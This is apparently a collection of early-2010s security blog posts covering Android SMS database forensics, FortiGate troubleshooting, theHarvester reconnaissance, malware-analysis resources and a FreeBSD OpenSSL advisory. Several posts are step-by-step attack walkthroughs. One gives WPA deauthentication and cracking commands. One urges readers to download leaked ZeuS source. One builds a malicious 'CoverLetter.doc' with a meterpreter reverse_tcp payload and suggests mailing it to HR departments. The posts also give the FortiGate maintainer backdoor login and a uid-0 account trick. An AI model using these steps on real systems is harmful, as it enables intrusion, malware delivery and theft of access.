In light of all the CarrierIQ press I started wondering what others applications on my phone might be doing things that I am not aware of. So I installed SQLite Editor and started poking around my phone, that’s when I decided to see what my sms client “Handcent” was up too. Since I wanted to view my out on a bigger monitor I fired up a adb shell and used SQLite see what Handcent sms was hiding under the hood.

I used the following command to search my /data/data folder on my device to look for any files with a .db extension since that indicated it was a database file.

adb shell find /data -name *.db

As you can see I found several databases on my phone but today
we will be looking at one in particular. Handcent's "hc_sms.db".

For this part we will use sqlite to view the database layout (schema)
and its contents:

sqlite> .schema
CREATE TABLE DELIVERY_REPORT (MESSAGE_ID INTEGER Primary KEY,TIMESTAMP text,UPDATE_TIMESTAMP text);

CREATE TABLE SEND_LOG (ID Integer Primary KEY,SID INTEGER ,SEND_TYPE INTEGER,BEGIN_SEND_TIME text,END_SEND_TIME text,SEND_CONTENT TEXT,
SENDING_PERSON_NUBER INTEGER,SUCCESS_NUMBER INTEGER,FAIL_NUMBER INTEGER);

CREATE TABLE SEND_LOG_DETAIL (SID INTEGER,PID INTEGER,BEGIN_SEND_TIME TEXT,END_SEND_TIME TEXT,PERSON_NAME TEXT,PERSON_NUMBER TEXT,SENDI
NG_MESSAGE_NUMBER INTEGER,SENT_SUCCESS_NUMBER INTEGER,SENT_FAIL_NUMBER INTEGER);
CREATE TABLE android_metadata (locale TEXT);

sqlite> .tables
DELIVERY_REPORT   SEND_LOG          SEND_LOG_DETAIL   android_metadata
sqlite>

And now after doing a select * from SEND_LOG; to my amazement
I saw all my text messages that were sent since I installed
the handcent application both DELETED and undeleted.


Also looking at select * from SEND_LOG_DETAIL I saw the same
information but this log also held the receiver of the sms name
and phone number.

Now my question is, if I am deleting a message and thinking
its being deleted why would handcent chose to keep a copy of
this message in an unencrypted database where anyone can access
it? I would love to hear from them and try to understand why
this is being done.


Objective:  I goal of this document is meant to outline a few steps that will allow you to troubleshoot the cause behind why users were unable to access the internet while behind a Fortigate 100A device.

Problem: I received a ticket today stating that users in one our computer labs were unable to access the internet.

After arriving onsite I discounted the device and plugged directly into the ISP link and confirmed that they were no issues with the ISP connection. Now is time to open a ticket with support and start the series of troubleshooting to figure out the root cause of the issue.

Step one: Information gathering

After opening the ticket I was told that the issue could have possibly been caused by a bad firmware image, or a corrupted configuration. I needed to log into the device to find out more information and the only way to do so was via the console port.

Connecting to the Fortigate 100A console port:

• Start your favorite terminal emulator program use the following settings:
• Baud rate: 9600
• Data bits: 8
• Parity: None
• Stop bit: 1
• Flow control: None
• Next, reboot the device and watch the screen for any error message.

After rebooting the first time I got the following message, “You must format the boot device”,  I then rebooted a second time and got the following message “The config file may contain errors, Please see details by the command ‘diagnose debug config-error-log read”.  This was somewhat good news because I would have had to RMA the device if the system RAM was corrupted.

At this point I know I had the following options:

• Backup the current configs
• Reset the device to it’s default state
• Reload a new configs

Backing up the device to USB via the console port:

• Plug a usb device into one of the ports on the back of the device
• Login to the device, if you are unable to use your admin login you can login with the maintainer account, this account is only valid for 30 sec after the device has been rebooted; so copy the username and password to a text file then cut/paste to the console. Username: maintainer Password: bcpb<input device serial number using uppercase letters>

• Issue the following command: execute backup configs usb filename<use any name here>
  FG100 # execute backup full-config usb fg100a-10-15-11
  Please wait…
  Copy onfigs fg100a-10-15-11 to USB disk …
  Copy onfigs file to USB disk OK.
  Setting timestamp

Before reloading a new configs its best to run a few diagnostic commands to try and understand what happened:

FG100 #  diag sys top –> Look at CPU load and any processor that running hot

FG100 # diag debug crashlog –> Look for clues as to what service crashed

          Ex Output:

89: 2011-11-14 16:06:42 <04434> application cmdbsvr

 290: 2011-11-14 16:06:42 <04434> *** signal 7 (Bus error) received ***

 291: 2011-11-14 16:06:42 <04434> Register dump:

298: 2011-11-14 16:06:42 <04434> Backtrace:

 299: 2011-11-14 16:06:42 <04434> [0x0893277b] => /bin/cmdbsvr 

 300: 2011-11-14 16:06:42 <04434> [0x08932a96] => /bin/cmdbsvr 

 301: 2011-11-14 16:06:42 <04434> [0x08910473] => /bin/cmdbsvr 

Reload new configs via console port:

• Rename your most recent backup configs file to fgt_system.conf, then place file on the root of your USB drive.
• Plug the USB into one of USB ports on the back of the unit and reboot the unit and you should see a similar output:

Reading boot image 1370111 bytes.
Initializing firewall…
System is started.
Get image from USB disk …Can not get image from USB disk.
Get config file from USB disk OK.
File check OK.

The system is going down NOW !!

 If you are not certain and you leave the drive in after the system reboots you will see the following message indication that the configs file on the disk is the same as the file on the system.

 Get config file from USB disk OK.
Checksum check synced! Don’t need restore config.

 Additional Troubleshooting:

After I restored the config file I was still unable to connect out to the internet, so I issued the following command to verify my IP address setting:

FG100A # get system interface  

After discovering that the IP address for my external interface WAN1 had a different subnet than the one I wrote down previously when I connected directly to my ISP modem with my PC. I decided to change the interface type to DHCP.

Configuring external interface for DHCP:

FG100A #  configs system interface –> To enter into Interface config mode

FG100A (interface) # edit wan1 –> Choose your external interface in our case it was wan1

FG100A (wan1) # unset ip –>  Removing current static IP entry

FG100A (wan1) # set mode dhcp –> To change mode to DHCP from static

FG100A (wan1) # show –> To confirm that the change was made

config system interface
edit “wan1″
set vdom “root”
set mode dhcp
set allowaccess https ssh fgfm
set type physical
next
end

 FG100A (wan1) # end

 I was now able to access the internet!!

Discovering what happened:

Wrap-up:

Given that the logs were lost due the fact the FortiGate was reset and the unit is storing it’s logs in RAM, I can’t diagnose the exact cause. But we did see in the Crashlog “diag debug crashlog read”, which is written to flash that the cmdbsvr was crashing. We have identified a issue with cmdbsvr on the version of fortios on your fortigate.

Bug #’s : 117281, 144277
Summary : cmdbsvr crash in conserve mode may cause configuration loss

I updated the device to MR3 patch 2, since this version addressed the issue.
Reference Documentation:

http://emea.fortinet.net/fortinet/bht/index.php

http://bit.ly/uRSdYJ

http://docs.fortinet.com/fscan/fortiscan_cli_40.pdf

I needed a way to effectively troubleshoot a given traffic issue on our FortiGate 100A device and the out of the box configuration didn’t have this configured. This can be accomplish using the web GUI or via an SSH session, and since I already have SSH configure I went with this option for most of the configuration.

Step 1: Enable Logging

SSH to the device with your favorite client and issue the following commands:

FG100A # show firewall policy (this command will display the details for all policies)

edit 1
set srcintf “internal”
set dstintf “wan1″
set srcaddr “all”
set dstaddr “all”
set action accept
set schedule “always”
set service “ANY”
set logtraffic disable
set nat enable

next
end

Once you know which policy you would like to troubleshoot it’s now time to enable logging

FG100A # edit 1 (to edit policy id 1)

FG100A (1) # set logtraffic enable (to enable logging for this policy)

Once you are finish you can always review your changes on the GUI if you would to do so click on Firewall tab –> Policy –> select the policy in question and click edit on the top –> Then click the check box for “Log Violation Traffic”

Next, click on the “Log&Report” tab –>Log Setting –> and check off “Local Logging & Archiving”, “Memory” –> Minimum log level “Information” –> check off “Enable IPS Packet Archive”

Apply settings!

Step 2:  Diagnose Sniffer Packet

Launch another SSH session and issue the follow command just makes sure you put the filter expressions in quotes:

diag sniffer packet <interface> <’filter’> <verbose> <count>

Simple test do a continuous ping from your workstation to an IP on the internet and then issue the command below and keep the windows open:

diag sniff packet any ‘host <workstation ip> and icmp’ 4

Step 2:  Enabling debug mode

Lastly in a another SSH window enable debug mode, set the source IP address and watch as a series of useful information flows across the console to help you narrow down the problem at hand.

diag debug enable
diag debug flow show console enable
diag debug flow show function-name enable
diag debug flow filter proto 1 (protocol 1 is for icmp)
diag debug flow filter addr <workstation ip>
diag debug flow trace start 400 (400 is a random number it’ the number of traces)

To disable the debug when you are finish run the following command:
diag debug disable

References:

http://docs.fortinet.com/fgt/techdocs/fortigate-admin.pdf

http://docs.fortinet.com/fgt/techdocs/fortigate-cli.pdf

I recently learned about this tool via twitter and decided to give it a try. According to the authors website theHarvester is a tool for gathering e-mail accounts, user names and hostnames/subdomains from different public sources like search engines and PGP key servers.

This tools is intended to help Penetration testers in the early stages of the project It’s a really simple tool, but very effective.

The sources supported are:

• Google – emails,subdomains/hostnames
• Google profiles – Employee names
• Bing search – emails, subdomains/hostnames,virtual hosts
• Pgp servers – emails, subdomains/hostnames
• Linkedin – Employee names
• Exalead – emails,subdomain/hostnames

New features:

• Time delays between requests
• XML results export
• Search a domain in all sources
• Virtual host verifier

Now my philosophy is that you can never have enough of these tools, whether you are a penetration tester or just want to see what information is out there on your organization this tool will come in handy.

Help Menu:

Here is a few sample queries from the authors website:

Searching emails accounts for the domain microsoft.com, it will work with the first 500 google results:

./theharvester.py -d microsoft.com -l 500 -b google

Searching emails accounts for the domain microsoft.com in a PGP server, here it’s not necessary to specify the limit.

./theharvester.py -d microsoft.com -b pgp

Searching for user names that works in the company microsoft, we use google as search engine, so we need to specify the limit of results we want to use:

./theharvester.py -d microsoft.com -l 200 -b linkedin

Searching in all sources at the same time, with a limit of 200 results:

./theHarvester.py -d microsoft.com -l 200 -b all

I did some testing of my own and found this tool to be useful, the only thing I was not able to find was the email address on a given company and I tried a few different queries in my test. All in all go  grab your copy and start testing away.

I recently picked up the book Hacking Exposed Wireless 2nd Ed , looks like an awesome book and I cant wait to start testing some of the fun stuff that Joshua , Johnny, and Vincent has lineup. Today while following a discussion in the Pauldotcom IRC room someone pointed me to this guide and I felt it was worth a re-post enjoy.

Hacking the WPA Airwaves

by Mark Bennett, infosecisland.com
May 16th 2011

It is interesting how many people believe that their wireless is secure because they are using WPA.

Well we did a test recently and were able to basically password guess our way with a dictionary attack using either a straight dictionary or a rainbow table.

The cool thing is I bought an ALFA USB antenna and could sit down at the corner coffee place and still see my wireless access point.

Security people: Be sure that your WPA password is an unreadable string, not something found in a dictionary, and not a phrase that you can read like op3nth3p0dbayd00rs, the tables of today are too intelligent for that.

In a nutshell using linux this is how it is done:

Part I

airmon-ng start wlan0 (this puts the wireless car in promiscuous mode)

kismet -c wlan0

• close console window to see collection of packets
• use alt + k to get to top pull down menu’s, turn on ability to see type of access points bsid and guess at IP address, channel #

Cntrl-C to exit kismet

airmon-ng stop wlan0

Part II

airmon-ng start wlan0

airodump-ng -c –bssid -w wlan0

Example:

airodump-ng -c 9 –bssid 00:1B:11:EC:3D:D7 -w D-Link wlan0  * Note D-Link-01.cap is where the capture of all traffic will go

Now open another window as we need to force a re-conect from the target (see the Note below)

aireplay-ng -a -c wlan0

Example:

airepley-ng -0 30 -a 00:1B:11:EC:3D:D7 -c 00:20:00:38:51:06 wlan0

You will see at the top of the airodump window a wpa re-key, capture some traffic and exit you will have captured all the traffic in the D-Link01.cap file.

Part III

Download either rainbow tables or direct dictionary from offensive security: offensive-security.com/wpa-tables

If using hashes (rainbow)

cowpatty -r -d -s

Example:

cowpatty -r D-Link-01.cap -d dlink.wpa -s dynamite

If using Dictionary words:

cowpatty -r -f -s

Example:

cowpatty -r D-Link-01.cap -f passwords.wpa -s dynamite

Note : If you are in an environment that has a lot of cell phones like the iPhone, (and they are using their wireless to connect to the network) we found these all go to sleep when their screen is turned off then their wireless Ethernet card has a wake-up when the screen is activated.

So you don’t need to send de-auth all you got to do is hang around long enough for someone to touch their iPhone or whatever cell and have it wake up it’s wireless and re-auth to the network, in other words there is the weakest link! — LOL!

Happy Cracking…

As Always, Be Good, Be Safe, and if you are going to hack, hack LEGALLY and RESPONSIBLY—I’m Out!

Cross-posted from Darknet Consulting

Original Page: https://www.infosecisland.com/blogview/13748-Hacking-the-WPA-Airwaves.html

I recently came across a really interesting intro writeup on browser exploit packs. The research team installed and tested over 40 different packs and provided some really nice feedback, here is the link.

For anyone that is not familiar what an exploit packs is, here is a brief definition;  “A browser exploit is a form of malicious code that takes advantage of a flaw or vulnerability in an operating system or piece of software with the intent to alter a user’s browser settings without their knowledge. Malicious code may exploit ActiveX, HTML, images, Java, JavaScript, and other Web technologies and cause the browser to run arbitrary code.”

The infamous ZeuS or zbot Trojan has made a name for itself in this arena. Even though zbot does not directly exploit any system vulnerability however it is very successful when it comes to infecting its victim. Zeus, which until recently was being sold on the underground black market for anywhere from $5,000-$10,000 or even more; because of this it was hard for the average guy to get his hands on a copy to review the source code.

Well not until a few days ago that is, now if you do a search for “Download the ZeuS Source Code”, you will come across several sites that are hosting a leaked copy of “Zeus 2.0.8.9″, and from the looks of things its a fully loaded copy. With that said grab your copy, turn on your VM’s and let the learning begin.

Links:

https://secure.wikimedia.org/wikipedia/en/wiki/Browser_exploit

http://www.scmagazineuk.com/zeus-source-code-now-available-for-5000-as-predictions-made-that-its-cost-will-continue-to-drop/article/199995/

http://www.mdl4.com/2011/05/download-zeus-source-code/

Now while reading about exploit pack I started wondering how I can get myself a copy without having to spend

A member of the Pauldotcom community posted a question to the mailing list  asking for FREE  help on getting started with reverse engineering malware. Since this is also a topic that is dear to my heart; I have decided to link to the discussion and summarize the resources mentioned below and added a few other useful links.

I am sure the are many resources out there both paid and free, however its always best to ask a group of experts to narrow down the overwhelming results you would normally get from  a Google search.

RE Forums and Blogs

http://zeltser.com/ (Checkout his cheat sheets, and webcasts)

http://contagiodump.blogspot.com/

http://www.kahusecurity.com

http://resources.infosecinstitute.com/articles/Malware/

http://krebsonsecurity.com

http://blog.didierstevens.com/

http://internetopenurla.blogspot.com/

http://computer-forensics.sans.org/blog/category/malware-analysis

http://computer-forensics.sans.org/blog/2010/11/12/get-started-with-malware-analysis

http://internetopenurla.blogspot.com/

http://honeynet.org/ (Check out the challenges section)

http://www.offensivecomputing.net/

http://www.woodmann.com/forum/

http://www.openrce.org/articles/

http://www.securitytube.net/?q=malware+analysis

Reverse Engineering and Malware Research Group (LinkedIn)

Commonly used Tools

http://zeltser.com/reverse-malware/#malware-analysis-tools

http://zeltser.com/remnux/

http://computer-forensics.sans.org/community/downloads/

Books

Malware: Fighting Malicious Code provides a foundation for understanding malicious software threats (I’m a co-author).

Malware Forensics focuses on incident response that involves malware, but also includes some malware analysis details.

The IDA Pro Book gets pretty deep into IDA Pro, which is a popular disassembler for compiled malicious executable, and is great for people who want to master this tool.

Malware Analyst’s Cookbook and DVD provides amazing tips and tools for malware incident response and analysis, but is best for the readers who have some familiarity with the topic beforehand.

You can leave your comments below of resources that you have used and found helpful.

I  will be joining the guys over at the   Linux Basix podcast tonight and below are some of the things I intend to discuss.

Discussion Links:

1. 7 Best Network Security Linux Distributions (DoortoDoor): A list of special purpose distros [BackTrack, Network Security Toolkit(NST),Pentoo, nUbuntu(Network Ubuntu),Security Tools Distribution(STD),Helix,Damn Vulnerable Linux]. These distributions are mainly designed to perform network security tasks such as vulnerability assessment and penetration testing in order to prevent and monitor unauthorized entry, abuse, alteration, or denial of computer network resources. Since most of these distros are available as Live CDs, you could instantly try or use them without hard disk installation. Read more over at http://www.junauza.com/2011/01/network-security-linux-distros.html
   
2. Soundminer: A Stealthy and Context-AwareSound Trojan for Smartphones: Researchers have developed a low-profile Trojan horse program for Google’s Android mobile OS that steals data in a way that is unlikely to be detected by either a user or antivirus software. The malware, called Soundminer, monitors phone calls and records when a person, for example, says their credit card number or enters one on the phone’s keypad, according to the study.Using various analysis techniques, Soundminer trims the extraneous recorded information down to the most essential, such as the credit card number itself, and sends just that small bit of information back to the attacker over the network, the researchers said. Read more over at http://www.csoonline.com/article/656264/soundminer-android-malware-listens-then-steals-phone-data

Tech Segment: Password reset the hard way

Problem: I was tasked with retrieving or resetting the web login password to a Linux based custom build system, very similar to an appliance. I currently had limited shell access to the system however I was not certain if the password was stored in /etc/passwd or in some sort of database on the system.

**Before we begin just know that everything mentioned here will probably not work on a normal Ubuntu based system, the manufacture possibly used their know custom Kernel and other system tweaks.**

Commands used:

1. netstat – a command-line tool that displays network connections, routing tables, and a number of network interface statistics.
2. fuser – a command line tool to identify processes using files or sockets.
3. lsof – a command line tool to list open files under Linux / UNIX to report a list of all open files and the processes that opened them.
4. /proc/$pid/ file system – Under Linux /proc includes a directory for each running process (including kernel processes) at /proc/PID, containing information about that process, notably including the processes name that opened port.
5. uname- Print name of current system

Phase one “Getting to know the system”:

I started off with a few simple commands to try and identify what various of Linux was the system running:

uname -a (Verify what kernel version I was up against)

yum (To see if it was a Fedora based system)

apt-get (To see if it was an Ubuntu based system and it was)

cat /etc/issue (To check what flavor of Ubuntu, turned out it was “Ubuntu 8.04″)

Next I wanted to get Root access without resetting the Root account password. I figured this would prevent me from having to deal with any restrictions issues.

Created a user called testuser
user@host:~$ sudo adduser testuser

Edit the password file and changed UID and GID to that of root (testuser:x:0:0)
user@host:~$ sudo nano /etc/passwd

Then once  I logged in newly created testuser and I am automatically given root access.
user@host:~$ su – testuser

Since I know that the service I am interest is running on port 443, I will run  few  commands to get a better ideal of whats really going on with this port.

Netstat to view the connection stated and PID for the services running on port 443:

root@host:~# netstat -tulpn | grep 443

tcp        0      0 0.0.0.0:443             0.0.0.0:*               LISTEN      5548/pound

To confirm the processes PID use the fuser command:

root@host:~# fuser 443/tcp
443/tcp:              5548  5549

To find out process name and working directory associated with PID # 5548, enter:

root@host:~# ls -l /proc/5548/exe
lrwxrwxrwx 1 root root 0 Jan 21 14:15 /proc/5548/exe -> /opt/pound/sbin/pound

root@host:~# ls -l /proc/5548/cwd
lrwxrwxrwx 1 root root 0 Jan 21 14:15 /proc/5548/cwd -> /opt/app_name/rails/ssl

Now I have an application name and working directory to go investigate. After further research I found out that Pound is a reverse-proxy load balancing server, and the config file showed me it was passing all connection on port 443 to another port on the same server.

I then used lsof to further investigate the newly discovered port:

root@host:# lsof -Pnl +M -i4
mongrel_r 5623      112    3u  IPv4  14528       TCP 127.0.0.1:3000 (LISTEN)

Then to find out the processes own:
root@host:# ps aux | grep 5623

app_user      5623  0.0  1.3  40048 28536 ?        Sl   14:14   0:02 /usr/bin/ruby1.8 /usr/bin/mongrel_rails start -d -e production -p 3000 -a 127.0.0.1 -P log/mongrel.3000.pid –user app_user –group app_name

A bit more research and I found out what mongrel_rails was. Mongrel is a fast HTTP library and server for Ruby that is intended for hosting Ruby web applications of any kind using plain HTTP rather than FastCGI or SCGI.

After poking around a bit more I notice the tie in with a postgres SQL server that I notice in a few earlier commands. Now on to the fun part!

Phase two “Modifying the system”:

Now that I have realized that the system has a database, and the user account is not location in the /etc/passwd file its time to access database identify the user account and make some modifications.

su – postgres to change to the postgres SQL user:
root@host:~# su – postgres

Launching PostgresSQL interactive terminal:
postgres@piab:~$ psql

List all the roles and Superusers :
postgres-# \du
List of roles
Role name | Superuser | Create role | Create DB | Connections | Member of
———–+———–+————-+———–+————-+———–
postgres  | yes       | yes         | yes       | no limit    |
App_User  | no        | no          | no        | no limit    |
(2 rows)

List all database on the system:

postgres=# \l
List of databases
Name    |  Owner   | Encoding
———–+———-+———-
postgres  | postgres | UTF8
App_Name  | postgres | UTF8

Connect to a database:
postgres=# \c App_Name

List of tables:
App_Name=# \dt

Schema |        Name        | Type  | Owner
——–+——————–+——-+——-
public | schema_info        | table | App_User
public | users              | table | App_User

Query table users:
select * from users;

Fields of interest to me were (id, login, email, password, salt_val,passwd_create,passwd_updated)

Now before I went any further I ensured to dump the DB using pg_dump and pg_dumpall
postgres@host:~$ pg_dump dbname > /tmp/dbname.out
postgres@host:~$ pg_dumpall > /tmp/db.out

At this point I had a few options:

• Try to reverse the password encryption and salting mechanism
• Try to find the code that handles the authentication and bypass that
• Get access to another box, create a password and copy that hash and encrypted value over to the DB on the other system.

Luckily for me I had access to another device so I  created a password there, and queried that DB and copied over the encrypted password and hash into notepad then used an insert statement to add to the values to the db along with a test user.

Connected back to the DB:
postgres=# \c App_Name

Insert new records:
INSERT INTO users (id,login,email,password,salt_val,created_at) values (’2′,’demo’,'demo@localhost’,’9abdgagf42324243240fdbd’,’8d5d6cd8fa6a0323jb3240988324′,’2006-12-05 21:15:32′);

Went back to the login portal https://ipaddress and bingo! Big shout out to byte_bucket over at irc.freenode.net #pauldotcom, he was very helpful in helping me work through this.

Additional reading:

http://www.cyberciti.biz/faq/what-process-has-open-linux-port/

http://linux.die.net/man/8/pound

http://linux.die.net/man/1/pg_dump

https://support.eapps.com/index.php?_m=knowledgebase&_a=viewarticle&kbarticleid=180

http://www.cyberciti.biz/faq/understanding-etcpasswd-file-format/

With the new year usually brings hope for new changes however it seems to be the same old story with Microsoft. First advisory of the year and already you have to sit around waiting for MS to release a patch. Todays blog posting is based on the new Vulnerability in Graphics Rendering Engine . The guys over at www.metasploit.com has created a working exploit module for this that I was testing and it seem to be working as stated.

According to the note in the module, This module exploits a stack-based buffer overflow in the handling of thumbnails within .MIC files and various Office documents. When processing a thumbnail bitmap containing a negative ‘biClrUsed’ value, a stack-based buffer overflow occurs. This leads to arbitrary code execution.  In order to trigger the vulnerable code, the folder containing the document must be viewed using the “Thumbnails” view.

The vulnerability is exploited via malicious thumbnail images that may be attached to various documents (e.g. Microsoft Office documents). The most likely exploit vector would use e-mail attachments. However, it is also possible to use network shares.

There is currently no patch available. However, it is possible to modify the access control list on shimgvw.dll to prevent rendering of thumbnails (this would affect all thumbnails, not just malicious once). See the Microsoft advisory for details.

Affected Platforms:

All current versions of Windows, with the exception of Windows 7 and 2008 R2, are vulnerable.

Mitigation:

There is currently no patch available. However, it is possible to modify the access control list on shimgvw.dll to prevent rendering of thumbnails (this would affect all thumbnails, not just malicious once). See the Microsoft advisory for details.

Test Lab Setup:

• I used Vmware Workstation with two hosts (XP, and BT4)
• I tested this against a Windows XP SP3 host
• I used Metasploit v3.6.0-dev [core3.6 api:1.0]  with SVN revision 11471 on BackTrack 4 R2
• Exploit module used can be found under modules/exploits/windows/fileformat/ms11_xxx_createsizeddibsection.rb

Steps Taken:

• Launched msfconsole from within the /pentest/exploits/framework3 directory on my BT4 R2 host, once that was up I then issued the svn up command to ensure I had the latest and greatest.

• Selected my exploit  –>  msf > use exploit/windows/fileformat/ms11_xxx_createsizeddibsection

• Set filename and Output path –>

msf exploit(ms11_xxx_createsizeddibsection) > set FILENAME CoverLetter.doc

FILENAME => CoverLetter.doc

msf exploit(ms11_xxx_createsizeddibsection) > set OUTPUTPATH opt/metasploit3/msf3/data/exploits

OUTPUTPATH => /opt/metasploit3/msf3/data/exploits

Choosing your Payload: I decided to go with the meterpreter

msf exploit(ms11_xxx_createsizeddibsection) > set PAYLOAD windows/meterpreter/reverse_tcp

PAYLOAD => windows/meterpreter/reverse_tcp

Setting up your local host (host you want victim to reverse connect too):

msf exploit(ms11_xxx_createsizeddibsection) > set LHOST 192.168.19.129

LHOST => 192.168.19.129

msf exploit(ms11_xxx_createsizeddibsection) > set LPORT 4545

LPORT => 4545

Next issue the command  exploit to create your malicious file:

msf exploit(ms11_xxx_createsizeddibsection) > exploit

[*] Creating ‘CoverLetter.doc’ file …

[*] Generated output file /opt/metasploit3/msf3/data/exploits/CoverLetter.doc

Next we need to setup our reverse handler to listen on port 4545 for any incoming connections once our victim views/open our specially crafter file.  We can take this resume file and blast it out to HR departments across the net and just sit back and wait for them to  connect back home .

msf exploit(ms11_xxx_createsizeddibsection) > use exploit/multi/handler

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp

PAYLOAD => windows/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST 192.168.19.129

LHOST => 192.168.19.129

msf exploit(handler) > set LPORT 4545

LPORT => 4545

msf exploit(handler) > exploit

Now once our victim views the file in a thumbnail view, or opens it  you should see something like this:

[*] Started reverse handler on 192.168.19.129:4545

[*] Starting the payload handler…

[*] Sending stage (749056 bytes) to 192.168.19.147

[*] Meterpreter session 1 opened (192.168.19.129:4545 -> 192.168.19.147:1591) at Tue Jan 04 20:39:40 -0500 2011

From here you can jump into a shell on the system by issuing the “shell” command, or setup a Persistence Meterpreter backdoor as shown by Carlos, or start Capturing Windows Logons with Smartlocker basically sky’s the limit……Have fun hacking something.

Refernce links:

https://www.microsoft.com/technet/security/advisory/2490606.mspx

http://blog.metasploit.com/2010/12/capturing-windows-logons-with.html

http://isc.sans.edu/diary.html?storyid=10201

I noticed an email this morning mentioned a openssl issue that affects the FreeBSD platform and I wanted to mention it again in case anyone missed it when it came out yesterday.

I just  patched my system  according to the steps in the advisory and I will report back if I experience any issues after patching.

I. Background

FreeBSD includes software from the OpenSSL Project. The OpenSSL Project is
a collaborative effort to develop a robust, commercial-grade, full-featured
Open Source toolkit implementing the Secure Sockets Layer (SSL v2/v3)
and Transport Layer Security (TLS v1) protocols as well as a full-strength
general purpose cryptography library.

II. Problem Description

A race condition exists in the OpenSSL TLS server extension code
parsing when used in a multi-threaded application, which uses
OpenSSL’s internal caching mechanism. The race condition can lead to
a buffer overflow. [CVE-2010-3864]

A double free exists in the SSL client ECDH handling code, when
processing specially crafted public keys with invalid prime
numbers. [CVE-2010-2939]

III. Impact

For affected server applications, an attacker may be able to utilize
the buffer overflow to crash the application or potentially run
arbitrary code with the privileges of the application. [CVE-2010-3864].

It may be possible to cause a DoS or potentially execute arbitrary in
the context of the user connection to a malicious SSL server.
[CVE-2010-2939]

IV. Workaround

No workaround is available, but CVE-2010-3864 only affects FreeBSD 8.0
and later.

It should also be noted that CVE-2010-3864 affects neither the Apache
HTTP server nor Stunnel.

V. Solution

Perform one of the following:

1) Upgrade your vulnerable system to 7-STABLE or 8-STABLE, or to the
RELENG_8_1, RELENG_8_0, RELENG_7_3, or RELENG_7_1 security branch
dated after the correction date.

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to FreeBSD 7.1, 7.3,
8.0 and 8.1 systems.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 7.x]
# fetch http://security.FreeBSD.org/patches/SA-10:10/openssl7.patch
# fetch http://security.FreeBSD.org/patches/SA-10:10/openssl7.patch.asc

[FreeBSD 8.x]
# fetch http://security.FreeBSD.org/patches/SA-10:10/openssl.patch
# fetch http://security.FreeBSD.org/patches/SA-10:10/openssl.patch.asc

b) Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch
# cd /usr/src/secure/lib/libssl
# make obj && make depend && make && make install

NOTE: On the amd64 platform, the above procedure will not update the
lib32 (i386 compatibility) libraries. On amd64 systems where the i386
compatibility libraries are used, the operating system should instead
be recompiled as described in
<URL:http://www.FreeBSD.org/handbook/makeworld.html>

3) To update your vulnerable system via a binary patch:

Systems running 7.1-RELEASE, 7.3-RELEASE, 8.0-RELEASE or 8.1-RELEASE
on the i386 or amd64 platforms can be updated via the
freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

VI. Correction details

The following list contains the revision numbers of each file that was
corrected in FreeBSD.

Links:

http://www.freebsd.org/security/advisories.html

http://security.freebsd.org/advisories/FreeBSD-SA-10:10.openssl.asc